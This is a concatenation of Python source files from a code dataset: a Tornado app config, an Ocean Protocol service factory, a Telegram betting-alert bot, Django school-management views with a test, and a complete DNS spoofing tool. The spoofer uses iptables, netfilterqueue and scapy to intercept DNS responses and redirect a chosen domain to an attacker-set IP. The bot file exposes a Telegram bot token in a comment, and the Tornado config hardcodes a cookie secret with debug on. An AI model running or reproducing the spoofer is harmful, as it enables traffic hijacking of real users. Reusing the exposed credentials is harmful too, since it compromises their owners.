template_path=os.path.join(os.path.dirname(__file__), \"template\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n static_handler_class=tornado.web.StaticFileHandler,\n cookie_secret='61oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=\",',\n debug=True,\n login_url = '/'\n )\n tornado.web.Application.__init__(self, Route.get_routes(),**settings)","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"135122274","text":"\n# Copyright 2018 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n\nfrom squid_py.agreements.service_agreement import ServiceAgreement\nfrom squid_py.agreements.service_agreement_template import ServiceAgreementTemplate\nfrom squid_py.agreements.service_types import ServiceTypes\nfrom squid_py.agreements.utils import get_sla_template_path\nfrom squid_py.ddo.service import Service\nfrom squid_py.did import did_to_id\nfrom squid_py.keeper import Keeper\n\n\nclass ServiceDescriptor(object):\n \"\"\"Tuples of length 2. The first item must be one of ServiceTypes and the second\n item is a dict of parameters and values required by the service\"\"\"\n\n @staticmethod\n def metadata_service_descriptor(metadata, service_endpoint):\n \"\"\"\n Metadata service descriptor.\n\n :param metadata: conforming to the Metadata accepted by Ocean Protocol, dict\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :return: Service descriptor.\n \"\"\"\n return (ServiceTypes.METADATA,\n {'metadata': metadata, 'serviceEndpoint': service_endpoint})\n\n @staticmethod\n def authorization_service_descriptor(service_endpoint):\n \"\"\"\n Authorization service descriptor.\n\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :return: Service descriptor.\n \"\"\"\n return (ServiceTypes.AUTHORIZATION,\n {'serviceEndpoint': service_endpoint})\n\n @staticmethod\n def access_service_descriptor(price, purchase_endpoint, service_endpoint, timeout, template_id):\n \"\"\"\n Access service descriptor.\n\n :param price: Asset price, int\n :param purchase_endpoint: url of the service provider, str\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :param timeout: amount of time in seconds before the agreement expires, int\n :param template_id: id of the template use to create the service, str\n :return: Service descriptor.\n \"\"\"\n return (ServiceTypes.ASSET_ACCESS,\n {'price': price, 'purchaseEndpoint': purchase_endpoint,\n 'serviceEndpoint': service_endpoint,\n 'timeout': timeout, 'templateId': template_id})\n\n @staticmethod\n def compute_service_descriptor(price, purchase_endpoint, service_endpoint, timeout):\n \"\"\"\n Compute service descriptor.\n\n :param price: Asset price, int\n :param purchase_endpoint: url of the service provider, str\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :param timeout: amount of time in seconds before the agreement expires, int\n :return: Service descriptor.\n \"\"\"\n return (ServiceTypes.CLOUD_COMPUTE,\n {'price': price, 'purchaseEndpoint': purchase_endpoint,\n 'serviceEndpoint': service_endpoint,\n 'timeout': timeout})\n\n\nclass ServiceFactory(object):\n \"\"\"Factory class to create Services.\"\"\"\n\n @staticmethod\n def build_services(did, service_descriptors):\n \"\"\"\n Build a list of services.\n\n :param did: DID, str\n :param service_descriptors: List of tuples of 
length 2. The first item must be one of\n ServiceTypes\n and the second item is a dict of parameters and values required by the service\n :return: List of Services\n \"\"\"\n services = []\n sa_def_key = ServiceAgreement.SERVICE_DEFINITION_ID\n for i, service_desc in enumerate(service_descriptors):\n service = ServiceFactory.build_service(service_desc, did)\n # set serviceDefinitionId for each service\n service.update_value(sa_def_key, str(i))\n services.append(service)\n\n return services\n\n @staticmethod\n def build_service(service_descriptor, did):\n \"\"\"\n Build a service.\n\n :param service_descriptor: Tuples of length 2. The first item must be one of ServiceTypes\n and the second item is a dict of parameters and values required by the service\n :param did: DID, str\n :return: Service\n \"\"\"\n assert isinstance(service_descriptor, tuple) and len(\n service_descriptor) == 2, 'Unknown service descriptor format.'\n service_type, kwargs = service_descriptor\n if service_type == ServiceTypes.METADATA:\n return ServiceFactory.build_metadata_service(\n did,\n kwargs['metadata'],\n kwargs['serviceEndpoint']\n )\n\n elif service_type == ServiceTypes.AUTHORIZATION:\n return ServiceFactory.build_authorization_service(\n kwargs['serviceEndpoint']\n )\n\n elif service_type == ServiceTypes.ASSET_ACCESS:\n return ServiceFactory.build_access_service(\n did, kwargs['price'],\n kwargs['purchaseEndpoint'], kwargs['serviceEndpoint'],\n kwargs['timeout'], kwargs['templateId']\n )\n\n elif service_type == ServiceTypes.CLOUD_COMPUTE:\n return ServiceFactory.build_compute_service(\n did, kwargs['price'],\n kwargs['purchaseEndpoint'], kwargs['serviceEndpoint'], kwargs['timeout']\n )\n\n raise ValueError(f'Unknown service type {service_type}')\n\n @staticmethod\n def build_metadata_service(did, metadata, service_endpoint):\n \"\"\"\n Build a metadata service.\n\n :param did: DID, str\n :param metadata: conforming to the Metadata accepted by Ocean Protocol, dict\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :return: Service\n \"\"\"\n return Service(service_endpoint,\n ServiceTypes.METADATA,\n values={'metadata': metadata},\n did=did)\n\n @staticmethod\n def build_authorization_service(service_endpoint):\n \"\"\"\n Build an authorization service.\n\n :param service_endpoint:\n :return: Service\n \"\"\"\n return Service(service_endpoint, ServiceTypes.AUTHORIZATION,\n values={'service': 'SecretStore'})\n\n @staticmethod\n def build_access_service(did, price, purchase_endpoint, service_endpoint, timeout, template_id):\n \"\"\"\n Build the access service.\n\n :param did: DID, str\n :param price: Asset price, int\n :param purchase_endpoint: url of the service provider, str\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :param timeout: amount of time in seconds before the agreement expires, int\n :param template_id: id of the template use to create the service, str\n :return: ServiceAgreement\n \"\"\"\n # TODO fill all the possible mappings\n param_map = {\n '_documentId': did_to_id(did),\n '_amount': price,\n '_rewardAddress': Keeper.get_instance().escrow_reward_condition.address,\n }\n sla_template_path = get_sla_template_path()\n sla_template = ServiceAgreementTemplate.from_json_file(sla_template_path)\n sla_template.template_id = template_id\n conditions = sla_template.conditions[:]\n for cond in conditions:\n for param in cond.parameters:\n param.value = param_map.get(param.name, '')\n\n if cond.timeout > 0:\n cond.timeout = timeout\n\n 
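# push the parameter-filled conditions back into the template so the ServiceAgreement\n        # below is built from concrete values rather than the raw template placeholders\n        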
sla_template.set_conditions(conditions)\n        sa = ServiceAgreement(\n            1,\n            sla_template,\n            purchase_endpoint,\n            service_endpoint,\n            ServiceTypes.ASSET_ACCESS\n        )\n        sa.set_did(did)\n        return sa\n\n    @staticmethod\n    def build_compute_service(did, price, purchase_endpoint, service_endpoint, timeout):\n        # TODO: implement this once the compute flow is ready\n        return\n","sub_path":"squid_py/agreements/service_factory.py","file_name":"service_factory.py","file_ext":"py","file_size_in_byte":7983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"352331974","text":"# https://tproger.ru/translations/regular-expression-python/\n# every 30 seconds send a GET request\n# -collect all the responses\n# -check the slugs in the responses and drop the selected slugs as the loop goes\n# -if it starts with '!', check time > time in DB\n#\tif so, write into a DICT = (id, time, filter, other settings)\n\t # and page through to the end, rewriting the dict, and at the end of the loop send the dict to the DB\n\t # and send a POST with the updates\n# send the data for every id, if there is any\n\n# bot registration function by nickname, returns the user id\n# path = \"https://api.telegram.org/bot778613806:AAE87MOTLo0gwGpJ7we5BWEcWjqDFmkZqZ4/\"\n# -*- coding: utf-8 -*-\nimport requests\nimport datetime as dt\nfrom models import *\nimport re\nimport time\nfrom doc_api import APIKEY as path\nfrom doc_api import STOP as finish\nimport socket\nfrom check_connection import connecting\n\n\n\n\ndef last_time_of_getupdate_Telegram(new_time='0', chat_id='', message=''):\n\t'''if old gettime < new_get_time = False'''\n\twith open('doc_ttime', '+r') as f:\n\t\tlines = f.readlines()\n\t\tif int(lines[-1]) < int(new_time):\n\t\t\tf.write(f'\\n User id: {chat_id} send message: {message} at\\n{new_time}')\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\ndef get_telegrams_updates_json(url):\n\ttry:\n\t\tsocket.gethostbyname('google.com')\n\t\tresponse = requests.get(f'{url}getUpdates')\n\t\tprint('models.py def get_telegrams_updates_json: internet is connected')\n\texcept socket.gaierror as e:\n\t\tprint('models.py def get_telegrams_updates_json: NO internet connection', e)\n\t\tprint(e.errno)\n\t\tconnecting()\n\n\ttry:\n\t\tresponse = response.json()['result']\n\t\treturn response\n\texcept KeyError:\n\t\tprint('telebot.py def get_telegrams_updates_json: KEYERROR')\n\t\treturn False\n\texcept UnboundLocalError:\n\t\tprint('telebot.py def get_telegrams_updates_json: UnboundLocalError')\n\t\tconnecting()\n\t\treturn False\n\n\ndef get_chat_id_for_new_user(chat_id, text_message):\n\t'''send chat_id to new user, if user is new'''\n\tuser_data = read_from_Users(user_login=text_message) # try to find user with login = text_message in Users table\n\tif user_data:\n\t\tif user_data.chat_id == '': # if it's the first request there is no chat_id for the new user\n\t\t\tuser_data.chat_id = str(chat_id)\n\t\t\tuser_data.save()\n\t\t\ttext = f'Hello {user_data.login} your id is {chat_id}'\n\t\t\tsend_message(chat_id=chat_id, text=text, url=path)\n\t\telse:\n\t\t\ttext = f'Wow {user_data.login} already has ID'\n\t\t\tsend_message(chat_id=chat_id, text=text, url=path)\n\telse:\n\t\tpass\n\n\ndef send_message(chat_id, text, url):\n\tparams = {'chat_id': chat_id, 'text': f'{text}'}\n\tresponse = requests.post(f'{url}sendMessage', data=params)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef check_comand_time_table(chat_id, time, message, user_conf):\n\t'''all info(chat_id, time, message from getupdate of Telegram)'''\n\ttime_for_time_table = 
message[4:-1].split('-') # we get time from messege like ['9:00','12:00']\n\tprint('telebot.py def check_comand_time_table : SLICE is ', time_for_time_table)\n\ttime_start = time_for_time_table[0].split(':') # get ['9','00']\n\ttime_finish = time_for_time_table[1].split(':') # get ['12','00']\n\tif (dt.time(int(time_start[0]),int(time_start[1])) < dt.time(int(time_finish[0]), int(time_finish[1]))) and\\\n\t(dt.time(2,59) < dt.time(int(time_start[0]),int(time_start[1])) < dt.time(23,59)) and\\\n\t(dt.time(2,59) < dt.time(int(time_finish[0]), int(time_finish[1])) < dt.time(23,59)): # 2.59 < 9.00<23.59 and 2.59 < 12.00<23.59 and 9.00<12.00\n\t\tuser_conf.start = time_for_time_table[0]\n\t\tuser_conf.finish = time_for_time_table[1]\n\t\tuser_conf.last_date_update_time_table = time\n\t\tuser_conf.save()\n\n\ndef check_comand_filter1(chat_id, time, message, user_conf):\n\tlist_filtres_data = message[1:].split(',') # get list ['td(10-20)','tb(2)']\n\ttd_list = list_filtres_data[0][3:-1].split('-') # get ['10','20']\n\tprint('check comand :',td_list[0], td_list[1])\n\tif int(td_list[0]) < int(td_list[1]):\n\t\tuser_conf.filter_set_main = message[1:]\n\t\tuser_conf.last_date_update_filtr = time\n\t\tuser_conf.save()\n\n\ndef check_slug_answer(user_obj, message):\n\tif ',' in message.strip():\n\t\tlist_message = message.split(',')\n\t\tslug_message = list_message[0]\n\t\tbet_message = list_message[1]\n\telse:\n\t\tslug_message = message\n\t\tbet_message=False\n\tupdate_event_by_slug_and_or_bet(user_obj=user_obj, slug=slug_message, bet=bet_message)\n\n\ndef check_all_or_last_slugs(user_obj, message):\n\n\t# print('In CHECK')\n\tif ',' in message:\n\t\tprint('IN COMA CHECK')\n\t\tlist_message = message.split(',')\n\t\tslug_message = list_message[0].strip()\n\t\tbet_message = list_message[1].strip()\n\t\tprint('slug_message, bet_message', slug_message, bet_message)\n\t\tif slug_message == 'addall':\n\t\t\tprint('telebot.py def check_all_or_last_slugs: ADDALL with BET')\n\t\t\treturn update_all_or_last_events_bet(user_obj, all_slugs=True, last_slugs=False, last_bet=bet_message)\n\t\tif slug_message == 'addlast':\n\t\t\tprint('telebot.py def check_all_or_last_slugs: ADDLAST with BET')\n\t\t\treturn update_all_or_last_events_bet(user_obj, all_slugs=False, last_slugs=True, last_bet=bet_message)\n\telse:\n\t\tprint('IN NO COMA CHECK')\n\t\tslug_message = message.strip()\n\t\tbet_message = ''\n\t\tif slug_message == 'addall':\n\t\t\tprint('telebot.py def check_all_or_last_slugs: ADDALL')\n\t\t\treturn update_all_or_last_events_bet(user_obj, all_slugs=True, last_slugs=False, last_bet=False)\n\t\tif slug_message == 'addlast':\n\t\t\tprint('telebot.py def check_all_or_last_slugs: ADDLAST')\n\t\t\treturn update_all_or_last_events_bet(user_obj, all_slugs=False, last_slugs=True, last_bet=False)\n\n\n\n\ndef new_events_for_users():\n\tjson_events = json_events_and_update_Online_Data_status_to_sent()\n\tif json_events:\n\t\tall_ids = json_events.keys()\n\t\tfor some_user in all_ids:\n\t\t\tfor message in json_events[some_user]:\n\t\t\t\tsend_message(chat_id=some_user, text=message, url=path)\n\n\n\ndef check_comand(chat_id, text_message, time_message, obj_user):\n\tprint(' telebot.py def check_comand :In Check comand for {0} with text = {1}'.format(obj_user.login, text_message))\n\n\tif text_message.strip()[0] == '!': # и больше времени в and chat_id in list_of_Users_id\n\t\tobj_userconf = get_object_UsersConfigs(userlogin='',userchat_id=chat_id)\n\n\t\tif 
re.match(r'^!tt\\([0-2]?[0-9]:[0-5][0-9]-\\d{1,2}:\\d{1,2}\\)$', text_message.strip()) and\\\n\t\tint(time_message) > int(obj_userconf.last_date_update_time_table): # we check like \"!tt(9:00-19:00)\" and time of last update timetable\n\t\t\tprint('telebot.py def check_comand: settings of timetabele for {0} was changed'.format(obj_user.login))\n\t\t\tcheck_comand_time_table(chat_id=chat_id, time=time_message, message=text_message, user_conf=obj_userconf)\n\t\t\tsend_message(chat_id=chat_id, text=text_message, url=path)\n\n\t\telif re.match(r'^!td\\([0-9]?[0-9]-[0-9]?[0-9]\\),(tb|tm)\\([0-1]?[0-9]\\)$', text_message.strip()) and\\\n\t\tint(time_message) > int(obj_userconf.last_date_update_filtr): # we check time from last messege in Telegram and time of last update of main filter: # we check temlate like \"!td(10-15)tm(5)\" and time of last update\n\t\t\tprint('telebot.py def check_comand: settings of main filter for {0} was changed'.format(obj_user.login))\n\t\t\tcheck_comand_filter1(chat_id=chat_id, time=time_message, message=text_message, user_conf=obj_userconf)\n\t\t\tcreate_new_item_in_Used_Filters(message_filter=text_message, user_chat_id=chat_id)\n\t\t\tsend_message(chat_id=chat_id, text=text_message, url=path)\n\n\t\telif re.match(r'^!\\w{3}\\d{2,6},(p1|p2|tb\\(\\d{1,2}\\)|tm\\(\\d{1,2}\\)|x|1x|2x|12|itb2\\(\\d{1,2}\\)|itb1\\(\\d{1,2}\\)|itb2\\(\\d{1,2}\\)|itm1\\(\\d{1,2}\\)|itm2\\(\\d{1,2}\\))|\\w{3}\\d{2,6}$', text_message.strip()): # we check temlate like \"slag,p1\"\n\t\t\tprint('telebot.py def check_comand: ADD INGAME EVENT WITH SLUG {0} FOR USER {1}'.format(text_message, obj_user.login))\n\t\t\tcheck_slug_answer(user_obj=obj_user, message=text_message[1:])\n\n\t\telif text_message.strip() == '!f1=0':\n\t\t\tprint('telebot.py def check_comand: THE FILTER was DELETED {0} FOR USER {1}'.format(text_message, obj_user.login))\n\t\t\tdell_filter_set_main_UsersConfigs(user_obj=obj_userconf, time=time_message)\n\t\t\tcreate_new_item_in_Used_Filters(message_filter=text_message, user_chat_id=chat_id)\n\t\t\ttext_for_message = f'No filter for you, we stoped searching'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\n\t\telif text_message.strip() == '!f1show':\n\t\t\tprint('telebot.py def check_comand: COMAND SHOW FILTER FOR USER {0}'.format(obj_user.login))\n\t\t\tf1, date_of_f1 = show_filter_set_main_UserConfigs(user_obj=obj_userconf)\n\t\t\ttext_for_message = f'The filter_main is {f1} updated at {date_of_f1}'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\n\t\telif text_message.strip() == '!ttshow':\n\t\t\tprint('telebot.py def check_comand: COMAND SHOW TIME TABLE FOR USER {0}'.format(obj_user.login))\n\t\t\tt_begin, t_finish = show_time_table_UserConfigs(user_obj=obj_userconf)\n\t\t\ttext_for_message = f'We start work at {t_begin} and finish at {t_finish}'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\n\t\telif re.match(r'^!addall|!addall,(p1|p2|tb\\(\\d{1,2}\\)|tm\\(\\d{1,2}\\)|x|1x|2x|12|itb2\\(\\d{1,2}\\)|itb1\\(\\d{1,2}\\)|itb2\\(\\d{1,2}\\)|itm1\\(\\d{1,2}\\)|itm2\\(\\d{1,2}\\))$',text_message.strip()): # !addall or addall,p1\n\t\t\tprint('7')\n\t\t\tif check_all_or_last_slugs(user_obj=obj_user, message=text_message[1:]):\n\t\t\t\ttext_for_message = f'All events have been added in game'\n\t\t\telse:\n\t\t\t\ttext_for_message = f'No events to add'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\n\t\telif 
re.match(r'^!addlast|!addlast,(p1|p2|tb\\(\\d{1,2}\\)|tm\\(\\d{1,2}\\)|x|1x|2x|12|itb2\\(\\d{1,2}\\)|itb1\\(\\d{1,2}\\)|itb2\\(\\d{1,2}\\)|itm1\\(\\d{1,2}\\)|itm2\\(\\d{1,2}\\))$',text_message.strip()): # !addlast or !addlast,p1\n\t\t\tprint('8')\n\t\t\tif check_all_or_last_slugs(user_obj=obj_user, message=text_message[1:]):\n\t\t\t\ttext_for_message = f'Last Events have been added in game'\n\t\t\telse:\n\t\t\t\ttext_for_message = f'No last events to add'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\t\telse:\n\t\t\tprint('9')\n\n\n# idd = '319868177'\n# mes = '!addall,p2'\n\n# time='1'\n# us=Users.get(Users.chat_id==idd)\n\n\n\n# check_comand(chat_id=idd, text_message=mes, time_message=time, obj_user=us)\n# Online_Data.update(bet='no').execute()\n\n# new_events_for_users()\n\n\ndef common_filter_of_messages(responses):\n\tif responses:\n\t\tfor response in responses:\n\t\t\tchatid = response['message']['chat']['id']\n\t\t\ttextmessage = response['message']['text']\n\t\t\ttimemessage = response['message']['date']\n\t\t\tnew_time = last_time_of_getupdate_Telegram(new_time=timemessage, chat_id=chatid, message=textmessage)\n\t\t\tif new_time:\n\t\t\t\tcontinue\n\t\t\tif textmessage == finish:\n\t\t\t\treturn 'STOP'\n\t\t\tget_chat_id_for_new_user(chat_id=chatid, text_message=textmessage)\n\t\t\tsome_user = read_from_Users(user_login='',user_chat_id=chatid)\n\t\t\tif some_user:\n\t\t\t\tcheck_comand(chat_id=chatid, text_message=textmessage, time_message=timemessage, obj_user=some_user)\n\n\n\ndef main():\n\twhile True:\n\t\tprint('telebot.py def main: IN LOOP', dt.datetime.now())\n\t\tresp = get_telegrams_updates_json(path)\n\t\tloop = common_filter_of_messages(responses=resp)\n\t\tif loop == 'STOP':\n\t\t\tprint('telebot.py def main: we get STOP message')\n\t\t\tbreak\n\t\tnew_events_for_users() # if in Online_Data are events with status = 'new' then send messages to users\n\t\ttime.sleep(15)\n\n\n# if __name__ == '__main__':\n# \tmain()\n\n\n\n\n\n\n","sub_path":"telebot.py","file_name":"telebot.py","file_ext":"py","file_size_in_byte":11475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"464415409","text":"from django.shortcuts import render, redirect\nfrom app import models\n\n\n# Create your views here.\n\n\n# application entry point\ndef index(req):\n    return render(req, 'index.html')\n\n\n# classes\n# show the class list\ndef show_class(req):\n    # display the class table data\n    # first fetch the rows from the class table\n    class_data = models.Class.objects.all()\n    # the teachers each class corresponds to\n    return render(req, 'show_class.html',\n                  {\n                      \"class_data\": class_data,\n                  })\n\n\n# add a class\ndef add_class(req):\n    # after receiving the POSTed data\n    if req.method == 'POST':\n        # grab the data first, then store it in the database\n        class_name = req.POST.get('class_name')\n        class_time = req.POST.get('class_time')\n        models.Class.objects.create(name=class_name, first_day=class_time)\n        # after saving, go back to the list page\n        return redirect('/show_class/')\n    # clicking the add button brings up the add page\n    return render(req, 'add_class.html')\n\n\n# delete a class\ndef del_class(req):\n    # when the delete button is clicked\n    # get the id of the row the button belongs to\n    del_id = req.GET.get('id')\n    # delete the matching row from the database and return the list page\n    models.Class.objects.filter(id=del_id).delete()\n    return redirect('/show_class/')\n\n\n# edit a class\ndef edit_class(req):\n    # the first click on the edit button opens the edit page\n    # look up the existing values and show them on the page\n    edit_id = req.GET.get('id')\n    # on the second submit, save the received data to the database\n    if req.method == 'POST':\n        # take the data and store it in the database\n        class_name = req.POST.get('class_name')\n        class_time = req.POST.get('class_time')\n        class_obj = models.Class.objects.filter(id=edit_id)[0]\n        class_obj.name = class_name\n        class_obj.first_day = class_time\n        
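# save the updated fields, then fall through to the redirect back to the class list\n        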
class_obj.save()\n        # show the final page\n        return redirect('/show_class/')\n    class_obj = models.Class.objects.filter(id=edit_id)[0]\n    # show the page\n    return render(req, 'edit_class.html', {\"class_obj\": class_obj})\n\n\n# list all students of a class\ndef class_in_student(req):\n    # when the button is clicked, first get the class name of that row\n    class_name = req.GET.get('id')\n    # query all students in that class\n    student_list = models.Class.objects.filter(name=class_name).values(\"student__name\")\n    return render(req, 'class_in_student.html', {\"class_name\": class_name, \"student_list\": student_list})\n\n\n# list the teachers of a class\ndef class_in_teacher(req):\n    # when the button is clicked, first get the class name of that row\n    class_name = req.GET.get('id')\n    # query all teachers of that class\n    teacher_list = models.Class.objects.filter(name=class_name).values(\"teacher__name\")\n    print(teacher_list)\n    return render(req, 'class_in_teacher.html', {\"class_name\": class_name, \"teacher_list\": teacher_list})\n\n\n# students\n# show students\ndef show_student(req):\n    # fetch all student records to display on the page\n    student_data = models.Student.objects.all()\n    class2teacher = models.Teacher.objects.all()\n    # render the page\n    return render(req, 'show_student.html', {\"student_data\": student_data, \"class2teacher\": class2teacher})\n\n\n# add a student\ndef add_student(req):\n    class_list = models.Class.objects.all()\n    # clicking the add button returns the add page\n    if req.method == 'POST':\n        # take the data and store it in the database\n        student_name = req.POST.get('student_name')\n        class_name_id = req.POST.get('class_name')\n        print(class_name_id)\n        models.Student.objects.create(name=student_name, class_in_id=class_name_id)\n        return redirect('/show_student/')\n    return render(req, 'add_student.html', {\"class_list\": class_list})\n\n\n# delete a student\ndef del_student(req):\n    # get the id of the row to delete\n    del_id = req.GET.get('id')\n    # delete the record from the database\n    models.Student.objects.filter(id=del_id).delete()\n    # show the page\n    return redirect('/show_student/')\n\n\n# edit a student\ndef edit_student(req):\n    # clicking the edit button returns the edit page\n    edit_id = req.GET.get('id')\n    class_list = models.Class.objects.all()\n    # when the data is submitted, save the changes\n    if req.method == 'POST':\n        # take the data and store it in the database\n        student_name = req.POST.get('student_name')\n        class_name_id = req.POST.get('class_name')\n        student_obj = models.Student.objects.filter(id=edit_id)[0]\n        student_obj.name = student_name\n        student_obj.class_in_id = class_name_id\n        student_obj.save()\n        return redirect('/show_student/')\n    # fetch the data from the database and return the page\n    student = models.Student.objects.filter(id=edit_id)[0]\n    return render(req, 'edit_student.html', {\"class_list\": class_list, \"student\": student})\n\n\n# teachers\n# show teachers\ndef show_teacher(req):\n    # fetch teacher and class data from the database to display on the page\n    class_list = models.Class.objects.all()\n    teacher_list = models.Teacher.objects.all()\n    # show the page\n    return render(req, 'show_teacher.html', {'class_list': class_list, \"teacher_list\": teacher_list})\n\n\n# add a teacher\ndef add_teacher(req):\n    # on the add page, clicking the add button stores the data in the database\n    if req.method == 'POST':\n        teacher_name = req.POST.get('teacher_name')\n        class_name = req.POST.getlist('class_name')\n        # store the data in the database\n        teacher_obj = models.Teacher.objects.create(name=teacher_name)\n        teacher_obj.teacher2class.set(class_name)\n        # return the page\n        return redirect('/show_teacher/')\n    # clicking the add button shows the class names to choose from\n    # fetch all classes\n    class_list = models.Class.objects.all()\n    return render(req, 'add_teacher.html', {'class_list': class_list})\n\n\n# delete a teacher\ndef del_teacher(req):\n    # get the id of the row to delete\n    del_id = req.GET.get('id')\n    # delete that row from the database\n    models.Teacher.objects.filter(id=del_id).delete()\n    # return the page after deletion\n    return redirect('/show_teacher/')\n\n\n# edit a teacher\ndef edit_teacher(req):\n    # first display this teacher's row\n    edit_id = req.GET.get('id')\n    # get the data for this row\n    teacher_obj = models.Teacher.objects.filter(id=edit_id)[0]\n    # fetch all classes\n    class_list = models.Class.objects.all()\n    # the edited data is submitted\n    if 
req.method == \"POST\":\n # 拿到发来的数据\n teacher_name = req.POST.get('teacher_name')\n class_name = req.POST.getlist('class_name')\n # 存入数据库\n teacher_obj.name = teacher_name\n teacher_obj.save()\n teacher_obj.teacher2class.set(class_name)\n # 返回展示页面\n return redirect('/show_teacher/')\n # 返回展示页面\n return render(req, 'edit_teacher.html', {'teacher_obj': teacher_obj, \"class_list\": class_list})\n","sub_path":"pro_two/mysite/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"229596092","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom django.test import TestCase, Client\n\nfrom my_web_project.main.models import Homework, Student\n\nUserModel = get_user_model()\n\n\nclass HomeworkDetailsTests(TestCase):\n def setUp(self):\n self.client = Client()\n self.user = UserModel.objects.create_user(username='student101', password='q1w2e3r4!')\n self.group_student = Group(name='Student')\n self.group_student.save()\n self.user.groups.add(self.group_student)\n self.student = Student.objects.get(pk=1)\n\n Homework.objects.create(\n title=\"My test homework\",\n student=self.student,\n upload='homeworks/Homework-_History_1.docx'\n\n )\n\n def test_homeworkDetailsOpens_successfully(self):\n self.client.force_login(self.user)\n\n response = self.client.get('/homeworks/details/1')\n\n self.assertEqual(response.status_code, 200)\n","sub_path":"tests/main/views/test_homework_detail.py","file_name":"test_homework_detail.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333102675","text":"#import libraries and modules\nimport subprocess\nimport optparse\nimport scapy.all as scapy\n\ntry:\n import netfilterqueue\nexcept:\n subprocess.call([\"pip3\",\"install\", \"-U\", \"git+https://github.com/kti/python-netfilterqueue\"])\n import netfilterqueue\n\n#runs bash-command: 'iptables _i FORWARD -j NFQUEUE --queue-num 666'\n#FORWARD: is the default queue to which packets, being routed through own machine, are passed\n #alternative: INPUT OUTPUT: is the default queue to which pachets leaving own computer / or coming in to own computer are passed\n#NFQUEUE: allows to put packet in any queue specified by the queue-number - here: this one is created and now packets from FORWARD will be saved here\n#queue-num: is the queue number for the newly created NFQUEUE - this number can be chosen at random from 0 - 65535\n# -I: a command, that inserts one or more rules in the selected chain\n# -j: specifies the target of the rule (-here: the rule inserted using '-I')\ndef get_args():\n '''\n Get command line arguments\n '''\n\n parser = optparse.OptionParser()\n parser.add_option(\"-o\", \"--packet-origin\", dest=\"packet_origin\", default=\"remote\",help=\"Origin of packets: can be 'own' or 'remote'\")\n\n (options, _) = parser.parse_args()\n\n if (options.packet_origin != \"own\") and (options.packet_origin != \"remote\"):\n parser.error(\"[-] Specify the origin of the packets using '-o ' or use '--help' for more info\")\n quit()\n else:\n return options.packet_origin\n\ndef process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload()) #draping the original packet into a scapy-IP-layer wil automatically convert it into a scapy packet\n if scapy_packet.haslayer(scapy.DNSRR): #RR - response; RQ - request\n qname = 
scapy_packet[scapy.DNSQR].qname.decode() # get name of targeted website from DNS REQUEST [=scapy.DNSRQ]; form [].\n if \"stackoverflow\" in qname:\n print(\"[+] Targeting the victim...\\n\") #print payload contained in packet\n answer = scapy.DNSRR(rrname=qname, rdata=\"10.0.2.15\") # creates a pDNS response qith qname of target, but IP address customly selected by 'rdata'; NOTE: scpay will fill in all other field by itself - rrname and rdata are the only 2 fields that scapy can NOT determine by itself\n scapy_packet[scapy.DNS].an = answer #replace DNS response in scpay_packet; [scapy.DNSRR] and [scapy.DNS].an both point to the DNA Response part of the packet\n scapy_packet[scapy.DNS].ancount = 1 # modify count of answers sent from x to 1 (becasue we just add 1 to the modified packet\n\n #delete length and checksxum information (fields) in 'scpay_package', so that it does not corrupt the modified package\n # --> scapy will automatically recalculate these fields and fill them in, based on the odifications\n del scapy_packet[scapy.IP].len\n del scapy_packet[scapy.IP].chksum\n del scapy_packet[scapy.UDP].len\n del scapy_packet[scapy.UDP].chksum\n\n packet.set_payload(bytes(scapy_packet)) # change original packet to modified scapy packet string\n print(packet)\n else:\n print(\"Not a DNS response packet.\")\n packet.accept() #forwards packet to its destination; using 'packet.drop()' will drop the packet and cut the internet connection of the client\n\n\nprint(\"===================\")\nprint(\"Starting DNS spoofer\")\nprint(\"===================\")\n\npacket_origin = get_args()\n\nif packet_origin == \"remote\":\n subprocess.call([\"iptables\", \"-I\", \"FORWARD\", \"-j\", \"NFQUEUE\", \"--queue-num\", \"666\"])\nelif packet_origin == \"own\":\n subprocess.call([\"iptables\", \"-I\", \"OUTPUT\", \"-j\", \"NFQUEUE\", \"--queue-num\", \"666\"])\n subprocess.call([\"iptables\", \"-I\", \"INPUT\", \"-j\", \"NFQUEUE\", \"--queue-num\", \"666\"])\n\ntry:\n queue = netfilterqueue.NetfilterQueue() # object that is going to interact with queue 666 created above\n queue.bind(666, process_packet) # binds variable 'queue' to 666 and executes a function on every packet in the queue\n queue.run()\nexcept KeyboardInterrupt:\n print(\"Shutting down program...\")\n print(\"Flushing IP Tables...\")\n subprocess.run([\"iptables\",\"--flush\"])\n print(\"IP Tables successfully reset.\")\n exit()\n\n","sub_path":"DNS_spoofer/dns_spoof.py","file_name":"dns_spoof.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"188401639","text":"'''\n //============================================================================\n // Name : 